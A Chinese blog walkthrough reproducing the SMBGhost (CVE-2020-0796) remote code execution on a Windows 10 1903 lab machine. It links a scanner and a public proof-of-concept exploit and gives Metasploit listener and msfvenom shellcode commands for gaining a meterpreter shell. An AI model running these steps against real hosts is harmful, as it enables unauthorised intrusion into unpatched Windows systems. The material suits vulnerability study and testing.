CVE-2020-0796(永恒之黑) getshell

 

前期准备

Windows10 1903版本下载:http://www.xitongtiandi.net/wenzhang/zuixin/33042.html

迅雷下载Windows10 pro1903 x64:

thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZlcnNpb25fMTkwM194NjRfZHZkXzhmMDUyNDFkLmlzb1pa

关闭防火墙,扫描到445

漏洞检测

检测poc下载:https://github.com/ollypwn/SMBGhost/blob/master/scanner.py

CVE-2020-0796 "poc"下载:https://github.com/chompie1337/SMBGhost_RCE_PoC

kali更新

更新源:打开源文件 vim /etc/apt/sources.list

添加一两个源:

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

 wq保存退出,执行更新命令

apt-get update
apt-get upgrade

msf开启监听,其中210的ip是Windows10 1903的ip

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.43.210
run

 生成反向链接木马

 执行命令 

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

如出现下面问题:you need to uninstall or upgrade bundler

原因及解决:由于新版kali默认安装的bundler为最新版本2.1.4。msfconsole依赖的版本为1.17.3,所以需要安装旧版本。执行如下命令:gem install bundler:1.17.3

接下来替换exploit.py中的payload

执行exploit.py,如图所示

 结果如下,此外这个poc不太稳定,第一次攻击成功后,后面几次都不能成功,还可能出现蓝屏。

漏洞复现参考至:https://mp.weixin.qq.com/s/SkjMVhFPSf8QsPe23cWjxQ

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值